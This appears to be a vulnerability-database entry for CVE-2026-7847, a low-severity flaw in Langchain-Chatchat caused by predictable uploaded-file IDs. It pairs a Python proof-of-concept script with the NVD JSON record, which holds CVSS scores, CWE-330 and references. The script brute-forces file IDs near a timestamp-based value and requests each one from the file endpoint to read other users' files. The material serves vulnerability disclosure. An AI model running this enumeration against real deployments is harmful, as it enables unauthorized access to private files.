CVE-2026-7847

import requests import time # Proof of Concept for CVE-2026-7847: Predictable File ID # This script demonstrates how an attacker might guess predictable file IDs. # Note: The actual prediction logic depends on the vulnerable implementation. TARGET_URL = "http://localhost:8000/v1/files/{}" # Attacker controls a low-privilege account and uploads a file to observe the ID pattern. def simulate_weak_random_id(timestamp_seed): """ Simulates a weak random ID generation logic. For example, if the ID is based on a predictable timestamp or simple counter. """ # Hypothetical vulnerable logic: ID = timestamp * 1000 + simple counter return int(timestamp_seed * 1000) def exploit(): print("[*] Starting CVE-2026-7847 PoC...") # Step 1: Attacker uploads a file and gets 'current_file_id' (e.g., 1715000000000) # or observes a known ID from the application. known_timestamp = time.time() base_id = simulate_weak_random_id(known_timestamp) print(f"[*] Observed base file ID pattern around: {base_id}") # Step 2: Brute force or predict subsequent IDs print("[*] Attempting to predict and access adjacent file IDs...") for offset in range(-100, 100): predicted_id = base_id + offset url = TARGET_URL.format(predicted_id) try: response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Successfully accessed file with predicted ID: {predicted_id}") # print(f"Content-Type: {response.headers.get('Content-Type')}") elif response.status_code == 403: print(f"[-] ID {predicted_id} exists but access is forbidden.") # Ignore 404s as they are expected for invalid IDs except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-7847", "sourceIdentifier": "[email protected]", "published": "2026-05-05T17:17:05.153", "lastModified": "2026-05-05T19:06:58.737", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in chatchat-space Langchain-Chatchat up to 0.3.1.3. The affected element is the function _get_file_id of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Uploaded File Handler. Performing a manipulation results in insufficiently random values. Access to the local network is required for this attack. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.4, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 2.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-310"}, {"lang": "en", "value": "CWE-330"}]}], "references": [{"url": "https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-3-Predictable-File-ID.md", "source": "[email protected]"}, {"url": "https://github.com/chatchat-space/Langchain-Chatchat/", "source": "[email protected]"}, {"url": "https://github.com/chatchat-space/Langchain-Chatchat/issues/5464", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/807796", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/361126", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/361126/cti", "source": "[email protected]"}]}}